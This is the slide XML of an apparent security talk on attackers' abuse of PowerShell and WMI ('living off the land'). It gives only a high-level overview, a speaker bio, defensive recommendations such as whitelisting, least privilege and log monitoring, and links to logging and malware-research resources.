              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C40BB4B5-9235-044B-B6B0-CAA2A3D5BF53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1614740" y="2897900"/>
            <a:ext cx="5190497" cy="2518162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3251958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a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WMI Eventing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8B039D-47C5-B94F-9F1D-C618158E81C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483704" y="2130379"/>
            <a:ext cx="11224591" cy="3740333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20716689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a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Me: Sunny Jamwal</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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Senior ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CyberSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” Consultant at MNP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Amateur Malware Analyst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Live in Ottawa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Love Poker, Reading and Travelling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2019 Goal: OSINT, Blue Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Favorite Book: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>“Advanced Penetration Testing (Wil Asllopp)”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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95243E72-6F05-424D-B256-427E8FB16CC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7791289" y="2249487"/>
            <a:ext cx="3117136" cy="2746259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21721794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1411" y="491400"/>
            <a:ext cx="9905998" cy="926582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RECOMMENDATIONs</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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1417982"/>
            <a:ext cx="9905999" cy="4850295"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application Whitelisting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Principal of Least privilege </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor WMI and PowerShell Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Regular Social Engineering Test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Educate operational staff on Defensive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Offensive skills.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://atomicredteam.io/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement formalized Threat Intelligence Program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Regular Backup, follow 3-2-1 Rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1902613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blinds(horizontal)">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1412" y="140217"/>
            <a:ext cx="9905998" cy="926582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Resources</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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="942536"/>
            <a:ext cx="9905999" cy="5325742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-03-detecting-wmi-exploitation-michael-gough</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Malware Blogs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.fireeye.com/blog/threat-research.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://securelist.com/all/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.symantec.com/blogs/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.malware-traffic-analysis.net/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Don Jones @concentrateddon</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Jeffrey Snover @jsnover</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0"/>
              <a:t>Book: “Learn PowerShell in a Month of Lunches” by Done Jones and Jeffery Hicks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30905444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3F5361-68C0-4BF5-80C8-F1E7BF92B2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1053734"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Thank You!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Questions??</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@browninfosecguy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9FFF0C0-C74B-2E4A-87E5-B187D664C5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0066" y="3683153"/>
            <a:ext cx="978916" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F61C8A8-B410-ED44-A26F-5E34251AD4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6866" y="3683153"/>
            <a:ext cx="893256" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36345549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CFD48AD-A92E-B74A-A2C6-5F0D53ECB3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="8468" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7552924" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C58BA57-4B59-D542-84DC-C27116B7408C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7928517" y="1905506"/>
            <a:ext cx="3189250" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>WMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Recommendations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Resources </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Q&amp;A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2070278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112081"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Malicious powershell and WMI</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4431999" y="1457570"/>
            <a:ext cx="6617000" cy="4493064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Living of the Land Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Using System tools, features and functionality for Malicious Purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Windows Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Regsvr32</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Makes Attribution harder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No risk of being detected/blocked by Anti-Virus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>System tools are already used by Sysadmins hence less probability to be flagged as malicious.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{323EB3C2-5EAD-2447-87A7-3BC254682738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="1423979"/>
            <a:ext cx="2815130" cy="4010042"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1398410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0"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>powershell</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4782547" y="1254312"/>
            <a:ext cx="6387201" cy="4583780"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Windows PowerShell is a Windows command-line shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Windows PowerShell is built on top of the .NET Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Windows PowerShell introduces the concept of a cmdlet single-function command-line tool built into the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Windows PowerShell accepts and returns .NET Framework objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>PowerShell makes it easier to interact with WIN 32 API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You don’t need to be a programmer to harness the power of .NET Framework.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384C2E2A-5460-8C4F-BE16-80FD4488C1DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="1254312"/>
            <a:ext cx="3284654" cy="3956515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4283193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151791"/>
